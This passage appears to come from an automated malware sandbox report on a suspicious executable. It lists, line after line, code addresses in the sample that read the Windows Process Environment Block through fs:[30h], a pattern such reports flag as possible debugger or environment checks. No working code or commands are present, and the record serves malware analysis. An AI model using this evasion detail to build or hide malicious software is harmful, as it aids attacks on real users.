                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117A30B mov eax, dword ptr fs:[00000030h] | 6_2_0117A30B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C035C mov eax, dword ptr fs:[00000030h] | 6_2_011C035C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C035C mov eax, dword ptr fs:[00000030h] | 6_2_011C035C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C035C mov eax, dword ptr fs:[00000030h] | 6_2_011C035C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C035C mov ecx, dword ptr fs:[00000030h] | 6_2_011C035C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C035C mov eax, dword ptr fs:[00000030h] | 6_2_011C035C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C035C mov eax, dword ptr fs:[00000030h] | 6_2_011C035C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E8350 mov ecx, dword ptr fs:[00000030h] | 6_2_011E8350
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C2349 mov eax, dword ptr fs:[00000030h] | 6_2_011C2349
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E437C mov eax, dword ptr fs:[00000030h] | 6_2_011E437C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0121634F mov eax, dword ptr fs:[00000030h] | 6_2_0121634F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0120A352 mov eax, dword ptr fs:[00000030h] | 6_2_0120A352
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01138397 mov eax, dword ptr fs:[00000030h] | 6_2_01138397
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01138397 mov eax, dword ptr fs:[00000030h] | 6_2_01138397
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01138397 mov eax, dword ptr fs:[00000030h] | 6_2_01138397
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116438F mov eax, dword ptr fs:[00000030h] | 6_2_0116438F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116438F mov eax, dword ptr fs:[00000030h] | 6_2_0116438F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113E388 mov eax, dword ptr fs:[00000030h] | 6_2_0113E388
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113E388 mov eax, dword ptr fs:[00000030h] | 6_2_0113E388
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113E388 mov eax, dword ptr fs:[00000030h] | 6_2_0113E388
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE3DB mov eax, dword ptr fs:[00000030h] | 6_2_011EE3DB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE3DB mov eax, dword ptr fs:[00000030h] | 6_2_011EE3DB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE3DB mov ecx, dword ptr fs:[00000030h] | 6_2_011EE3DB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011EE3DB mov eax, dword ptr fs:[00000030h] | 6_2_011EE3DB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E43D4 mov eax, dword ptr fs:[00000030h] | 6_2_011E43D4
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011E43D4 mov eax, dword ptr fs:[00000030h] | 6_2_011E43D4
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011FC3CD mov eax, dword ptr fs:[00000030h] | 6_2_011FC3CD
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A3C0 mov eax, dword ptr fs:[00000030h] | 6_2_0114A3C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A3C0 mov eax, dword ptr fs:[00000030h] | 6_2_0114A3C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A3C0 mov eax, dword ptr fs:[00000030h] | 6_2_0114A3C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A3C0 mov eax, dword ptr fs:[00000030h] | 6_2_0114A3C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A3C0 mov eax, dword ptr fs:[00000030h] | 6_2_0114A3C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A3C0 mov eax, dword ptr fs:[00000030h] | 6_2_0114A3C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011483C0 mov eax, dword ptr fs:[00000030h] | 6_2_011483C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011483C0 mov eax, dword ptr fs:[00000030h] | 6_2_011483C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011483C0 mov eax, dword ptr fs:[00000030h] | 6_2_011483C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011483C0 mov eax, dword ptr fs:[00000030h] | 6_2_011483C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C63C0 mov eax, dword ptr fs:[00000030h] | 6_2_011C63C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0115E3F0 mov eax, dword ptr fs:[00000030h] | 6_2_0115E3F0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0115E3F0 mov eax, dword ptr fs:[00000030h] | 6_2_0115E3F0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0115E3F0 mov eax, dword ptr fs:[00000030h] | 6_2_0115E3F0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011763FF mov eax, dword ptr fs:[00000030h] | 6_2_011763FF
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011503E9 mov eax, dword ptr fs:[00000030h] | 6_2_011503E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011503E9 mov eax, dword ptr fs:[00000030h] | 6_2_011503E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011503E9 mov eax, dword ptr fs:[00000030h] | 6_2_011503E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011503E9 mov eax, dword ptr fs:[00000030h] | 6_2_011503E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011503E9 mov eax, dword ptr fs:[00000030h] | 6_2_011503E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011503E9 mov eax, dword ptr fs:[00000030h] | 6_2_011503E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011503E9 mov eax, dword ptr fs:[00000030h] | 6_2_011503E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011503E9 mov eax, dword ptr fs:[00000030h] | 6_2_011503E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113823B mov eax, dword ptr fs:[00000030h] | 6_2_0113823B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113A250 mov eax, dword ptr fs:[00000030h] | 6_2_0113A250
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01146259 mov eax, dword ptr fs:[00000030h] | 6_2_01146259
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011FA250 mov eax, dword ptr fs:[00000030h] | 6_2_011FA250
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011FA250 mov eax, dword ptr fs:[00000030h] | 6_2_011FA250
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C8243 mov eax, dword ptr fs:[00000030h] | 6_2_011C8243
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C8243 mov ecx, dword ptr fs:[00000030h] | 6_2_011C8243
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011F0274 mov eax, dword ptr fs:[00000030h] | 6_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01144260 mov eax, dword ptr fs:[00000030h] | 6_2_01144260
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01144260 mov eax, dword ptr fs:[00000030h] | 6_2_01144260
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01144260 mov eax, dword ptr fs:[00000030h] | 6_2_01144260
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0113826B mov eax, dword ptr fs:[00000030h] | 6_2_0113826B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0121625D mov eax, dword ptr fs:[00000030h] | 6_2_0121625D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117E284 mov eax, dword ptr fs:[00000030h] | 6_2_0117E284
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117E284 mov eax, dword ptr fs:[00000030h] | 6_2_0117E284
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C0283 mov eax, dword ptr fs:[00000030h] | 6_2_011C0283
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C0283 mov eax, dword ptr fs:[00000030h] | 6_2_011C0283
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C0283 mov eax, dword ptr fs:[00000030h] | 6_2_011C0283
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011502A0 mov eax, dword ptr fs:[00000030h] | 6_2_011502A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011502A0 mov eax, dword ptr fs:[00000030h] | 6_2_011502A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D62A0 mov eax, dword ptr fs:[00000030h] | 6_2_011D62A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D62A0 mov ecx, dword ptr fs:[00000030h] | 6_2_011D62A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D62A0 mov eax, dword ptr fs:[00000030h] | 6_2_011D62A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D62A0 mov eax, dword ptr fs:[00000030h] | 6_2_011D62A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D62A0 mov eax, dword ptr fs:[00000030h] | 6_2_011D62A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D62A0 mov eax, dword ptr fs:[00000030h] | 6_2_011D62A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A2C3 mov eax, dword ptr fs:[00000030h] | 6_2_0114A2C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A2C3 mov eax, dword ptr fs:[00000030h] | 6_2_0114A2C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A2C3 mov eax, dword ptr fs:[00000030h] | 6_2_0114A2C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A2C3 mov eax, dword ptr fs:[00000030h] | 6_2_0114A2C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0114A2C3 mov eax, dword ptr fs:[00000030h] | 6_2_0114A2C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011502E1 mov eax, dword ptr fs:[00000030h] | 6_2_011502E1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011502E1 mov eax, dword ptr fs:[00000030h] | 6_2_011502E1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011502E1 mov eax, dword ptr fs:[00000030h] | 6_2_011502E1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_012162D6 mov eax, dword ptr fs:[00000030h] | 6_2_012162D6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011D6500 mov eax, dword ptr fs:[00000030h] | 6_2_011D6500
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01150535 mov eax, dword ptr fs:[00000030h] | 6_2_01150535
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01150535 mov eax, dword ptr fs:[00000030h] | 6_2_01150535
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01150535 mov eax, dword ptr fs:[00000030h] | 6_2_01150535
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01150535 mov eax, dword ptr fs:[00000030h] | 6_2_01150535
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01150535 mov eax, dword ptr fs:[00000030h] | 6_2_01150535
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01150535 mov eax, dword ptr fs:[00000030h] | 6_2_01150535
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214500 mov eax, dword ptr fs:[00000030h] | 6_2_01214500
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214500 mov eax, dword ptr fs:[00000030h] | 6_2_01214500
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214500 mov eax, dword ptr fs:[00000030h] | 6_2_01214500
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214500 mov eax, dword ptr fs:[00000030h] | 6_2_01214500
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214500 mov eax, dword ptr fs:[00000030h] | 6_2_01214500
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214500 mov eax, dword ptr fs:[00000030h] | 6_2_01214500
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01214500 mov eax, dword ptr fs:[00000030h] | 6_2_01214500
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E53E mov eax, dword ptr fs:[00000030h] | 6_2_0116E53E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E53E mov eax, dword ptr fs:[00000030h] | 6_2_0116E53E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E53E mov eax, dword ptr fs:[00000030h] | 6_2_0116E53E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E53E mov eax, dword ptr fs:[00000030h] | 6_2_0116E53E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E53E mov eax, dword ptr fs:[00000030h] | 6_2_0116E53E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01148550 mov eax, dword ptr fs:[00000030h] | 6_2_01148550
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01148550 mov eax, dword ptr fs:[00000030h] | 6_2_01148550
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117656A mov eax, dword ptr fs:[00000030h] | 6_2_0117656A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117656A mov eax, dword ptr fs:[00000030h] | 6_2_0117656A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117656A mov eax, dword ptr fs:[00000030h] | 6_2_0117656A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117E59C mov eax, dword ptr fs:[00000030h] | 6_2_0117E59C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01142582 mov eax, dword ptr fs:[00000030h] | 6_2_01142582
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01142582 mov ecx, dword ptr fs:[00000030h] | 6_2_01142582
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_01174588 mov eax, dword ptr fs:[00000030h] | 6_2_01174588
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011645B1 mov eax, dword ptr fs:[00000030h] | 6_2_011645B1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011645B1 mov eax, dword ptr fs:[00000030h] | 6_2_011645B1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C05A7 mov eax, dword ptr fs:[00000030h] | 6_2_011C05A7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C05A7 mov eax, dword ptr fs:[00000030h] | 6_2_011C05A7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011C05A7 mov eax, dword ptr fs:[00000030h] | 6_2_011C05A7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011465D0 mov eax, dword ptr fs:[00000030h] | 6_2_011465D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117A5D0 mov eax, dword ptr fs:[00000030h] | 6_2_0117A5D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117A5D0 mov eax, dword ptr fs:[00000030h] | 6_2_0117A5D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117E5CF mov eax, dword ptr fs:[00000030h] | 6_2_0117E5CF
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117E5CF mov eax, dword ptr fs:[00000030h] | 6_2_0117E5CF
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E5E7 mov eax, dword ptr fs:[00000030h] | 6_2_0116E5E7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E5E7 mov eax, dword ptr fs:[00000030h] | 6_2_0116E5E7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E5E7 mov eax, dword ptr fs:[00000030h] | 6_2_0116E5E7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E5E7 mov eax, dword ptr fs:[00000030h] | 6_2_0116E5E7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E5E7 mov eax, dword ptr fs:[00000030h] | 6_2_0116E5E7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E5E7 mov eax, dword ptr fs:[00000030h] | 6_2_0116E5E7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E5E7 mov eax, dword ptr fs:[00000030h] | 6_2_0116E5E7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0116E5E7 mov eax, dword ptr fs:[00000030h] | 6_2_0116E5E7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011425E0 mov eax, dword ptr fs:[00000030h] | 6_2_011425E0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117C5ED mov eax, dword ptr fs:[00000030h] | 6_2_0117C5ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0117C5ED mov eax, dword ptr fs:[00000030h] | 6_2_0117C5ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01178402 mov eax, dword ptr fs:[00000030h]6_2_01178402
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01178402 mov eax, dword ptr fs:[00000030h]6_2_01178402
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01178402 mov eax, dword ptr fs:[00000030h]6_2_01178402
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117A430 mov eax, dword ptr fs:[00000030h]6_2_0117A430
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113E420 mov eax, dword ptr fs:[00000030h]6_2_0113E420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113E420 mov eax, dword ptr fs:[00000030h]6_2_0113E420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113E420 mov eax, dword ptr fs:[00000030h]6_2_0113E420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113C427 mov eax, dword ptr fs:[00000030h]6_2_0113C427
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C6420 mov eax, dword ptr fs:[00000030h]6_2_011C6420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C6420 mov eax, dword ptr fs:[00000030h]6_2_011C6420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C6420 mov eax, dword ptr fs:[00000030h]6_2_011C6420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C6420 mov eax, dword ptr fs:[00000030h]6_2_011C6420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C6420 mov eax, dword ptr fs:[00000030h]6_2_011C6420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C6420 mov eax, dword ptr fs:[00000030h]6_2_011C6420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C6420 mov eax, dword ptr fs:[00000030h]6_2_011C6420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011FA456 mov eax, dword ptr fs:[00000030h]6_2_011FA456
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116245A mov eax, dword ptr fs:[00000030h]6_2_0116245A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113645D mov eax, dword ptr fs:[00000030h]6_2_0113645D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E443 mov eax, dword ptr fs:[00000030h]6_2_0117E443
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E443 mov eax, dword ptr fs:[00000030h]6_2_0117E443
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E443 mov eax, dword ptr fs:[00000030h]6_2_0117E443
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E443 mov eax, dword ptr fs:[00000030h]6_2_0117E443
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E443 mov eax, dword ptr fs:[00000030h]6_2_0117E443
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E443 mov eax, dword ptr fs:[00000030h]6_2_0117E443
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E443 mov eax, dword ptr fs:[00000030h]6_2_0117E443
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E443 mov eax, dword ptr fs:[00000030h]6_2_0117E443
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116A470 mov eax, dword ptr fs:[00000030h]6_2_0116A470
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116A470 mov eax, dword ptr fs:[00000030h]6_2_0116A470
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116A470 mov eax, dword ptr fs:[00000030h]6_2_0116A470
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CC460 mov ecx, dword ptr fs:[00000030h]6_2_011CC460
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011FA49A mov eax, dword ptr fs:[00000030h]6_2_011FA49A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011744B0 mov ecx, dword ptr fs:[00000030h]6_2_011744B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CA4B0 mov eax, dword ptr fs:[00000030h]6_2_011CA4B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011464AB mov eax, dword ptr fs:[00000030h]6_2_011464AB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011404E5 mov ecx, dword ptr fs:[00000030h]6_2_011404E5
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140710 mov eax, dword ptr fs:[00000030h]6_2_01140710
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01170710 mov eax, dword ptr fs:[00000030h]6_2_01170710
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117C700 mov eax, dword ptr fs:[00000030h]6_2_0117C700
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117273C mov eax, dword ptr fs:[00000030h]6_2_0117273C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117273C mov ecx, dword ptr fs:[00000030h]6_2_0117273C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117273C mov eax, dword ptr fs:[00000030h]6_2_0117273C
